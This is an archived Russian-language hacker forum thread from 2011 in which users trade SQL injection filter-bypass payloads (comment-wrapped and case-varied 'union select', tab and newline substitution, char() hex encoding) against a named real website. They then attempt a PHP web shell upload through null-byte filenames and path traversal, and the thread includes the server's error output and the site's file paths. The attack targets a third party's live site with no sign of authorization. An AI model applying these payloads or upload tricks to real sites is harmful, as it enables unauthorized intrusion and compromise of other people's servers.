PDA

Просмотр полной версии : Обход очень интересной фильтрации в SQL Inj


Pirotexnik
13.11.2011, 14:35
Добрый день.

Наткнулся на странную защиту. Там фильтруются ключевые слова и тэги. Причем крайне коряво, но удачно фильтруется слово SELECT

Можно как-то запрос


+union+select+1,2,3,4,5,6+--+

реализовать без select? Или же как-то закодировать его от фильтра?

Спасибо.

HAXTA4OK
13.11.2011, 14:43
+union+/*!select*/+1,2,3,4,5,6+--+

+union+%0Aselect+1,2,3,4,5,6+--+

поробуй так

Pirotexnik
13.11.2011, 14:50
увы, отфильтровало оба варианта...

Судя по всему там поиск по строке на совпадения.

Был, вроде, какой-то способ закодировать в хекс или base64, но я его не знаю, и не смог найти в гугле

p.s. А может можно вставить 1 символ чаром?

тоесть union+sel(char(101))ct+ ?

Это возможно? Как правильно?

aydin-ka
13.11.2011, 14:52
+UnIoN+SeLeCt+1,2,3,4,5+--+

вместо + можно поставить %09 если ещё фильтруется "+"

Osstudio
13.11.2011, 14:52
Вот как делают профессионалы:


?id=(1)and(1=0)union/*c*/select(1),2,3,4,5,6--

Pirotexnik
13.11.2011, 14:57
Народ, вы не поняли...

В запросе просто ПОИСКОМ ищутся ключевые слова.

Поэтому везде, где есть select - срабатывает фильтр...

p.s. сканируется адресная строка, и только!

Если это обойти - дольше уже не вазникнет проблемм.

mailbrush
13.11.2011, 15:01
Вот как делают профессионалы:


Osstudio, как всегда, отжигает

ТС, если идет тупо поиск подстроки - не обойдешь никак.

Фильтр может быть корявым, попробуй через POST отправить, но я сомневаюсь, что это сработает...

aydin-ka
13.11.2011, 15:02
+union+char(0x73,0x65,0x6c,0x65,0x63,0x74)+1,2,3,4 ,5+--+

Osstudio
13.11.2011, 15:05
Блин, Глебан, давай линк в студию, мы не ванги тут между прочим, ты ещё много-го не понимаешь, и по этому можешь ошибаться, ГОНИ ЛИНК!

Пробуй "WITHOUT UNION"


Osstudio, как всегда, отжигает


Ну а как же

Pirotexnik
13.11.2011, 15:09
Блин, Глебан, давай линк в студию


Да, пап

http://lugbasket.org.ua/php/game.php?id=12

aydin-ka, твой вариант - вообще не отработал как запрос.

mailbrush, пост фильтруется, кукие - не используется.

aydin-ka
13.11.2011, 15:14
Если вы попали на эту страницу значит вероятнее всего вы пытались совершить атаку на наш сервер.


Забыл прокси включить и спалил вой реальный IP

Osstudio
13.11.2011, 15:14
Вы обвененны в попытке совершения xss атаки


мда..вот эта защита

Пиротехник, твой сервак чтоль?

http://lugbasket.org.ua/pirotehnik.php

Pirotexnik
13.11.2011, 15:16
Этот сайт написал мой одногрупник, и заявил что его никто не сломает

Там даже мне посвящена при переходе на страницу бана линка)))

Osstudio
13.11.2011, 15:23
Этот сайт написал мой одногрупник, и заявил что его никто не сломает
Там даже мне посвящена при переходе на страницу бана линка)))


Ну, ну... если что, я уже шелл лью...

Pirotexnik
13.11.2011, 15:28
Осст, КАК?! Объясни мне...

Osstudio
13.11.2011, 15:30
Объясни мне...


Подумай...

Pirotexnik
13.11.2011, 19:08
Тема с инъекцией актуальна. Какие ещё есть варианты?

Либо как боротся с залитым шелом, который выдаёт ошибку 500

Osstudio
13.11.2011, 19:41
Тема с инъекцией актуальна. Какие ещё есть варианты?
Либо как боротся с залитым
шелом, который выдаёт ошибку 500


Что за бред? Ты что-то не так залил, видимо...

Pirotexnik
13.11.2011, 19:58
Что за бред? Ты что-то не так залил, видимо...


nope! Когда файлик заливается с правами 666 - его нелзя исполнять. Или когда папка с какими-то антиисполняемыми параметрами. Вообщем нужно лить в корень.

Pirotexnik
13.11.2011, 20:06
У меня тут ещё 1 вопрос появился.

Назвал файл shell.php%00.jpg

Залился как shell.php%00.jpg ;(

Назвал 'shell.php%00.jpg

поймал


Warning: imagecreatefromjpeg(../img/gameFiles/\'piro.php%00.jpg) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /home/lugbskt/public_html/php/include/functions.php on line 711

Может это можно как-то использовать, что бы залится в католог выше?

Osstudio
13.11.2011, 20:53
У меня тут ещё 1 вопрос появился.
Назвал файл shell.php%00.jpg
Залился как shell.php%00.jpg ;(
Назвал 'shell.php%00.jpg
поймал

Warning: imagecreatefromjpeg(../img/gameFiles/\'piro.php%00.jpg) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /home/lugbskt/public_html/php/include/functions.php on line 711

Может это можно как-то использовать, что бы залится в католог выше?


Попробуй приписать к имени файла ../

Pirotexnik
13.11.2011, 21:01
10
Warning: Division by zero in /home/lugbskt/public_html/php/include/functions.php on line 707

Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: gd-jpeg: JPEG library reports unrecoverable error: in /home/lugbskt/public_html/php/include/functions.php on line 715

Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: '../img/gameFiles/10.jpg' is not a valid JPEG file in /home/lugbskt/public_html/php/include/functions.php on line 715

Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /home/lugbskt/public_html/php/include/functions.php on line 724

Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/lugbskt/public_html/php/include/functions.php on line 728

Warning: imagejpeg(): supplied argument is not a valid Image resource in /home/lugbskt/public_html/php/include/functions.php on line 731


'%2F..%2Fimg.php%00.jpg

romagaisin
13.11.2011, 21:16
Это называется hex. Вроде нельзя, но сейчас попробую.

romagaisin
13.11.2011, 21:23
%2f вот слеш попробуй

Pirotexnik
16.11.2011, 00:56
Шелл залить не вышло. Там функция преиминовывает файл... поэтому в лучшем случае - это *.gif

Какие будут ещё варианты? Что по поводу обхода фильтрации select?

BluR
22.11.2011, 02:36
Вот вариант

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=2010-4344

Удачи ...

[Devil](IT)
22.11.2011, 14:06
Шелл залить не вышло. Там функция преиминовывает файл... поэтому в лучшем случае - это *.gif
Какие будут ещё варианты? Что по поводу обхода фильтрации select?


Если стоит фильтрация с валидацией/переименованием файла на сервере посредством от основного модуля на дочерний(тот где ты льешь), то вариант мертвый.

подзапросы не пробовал на сам модуль?

ps: у меня где-то такой зверек попадался, пороюсь в старом хламе, как найду - выложу подробнее.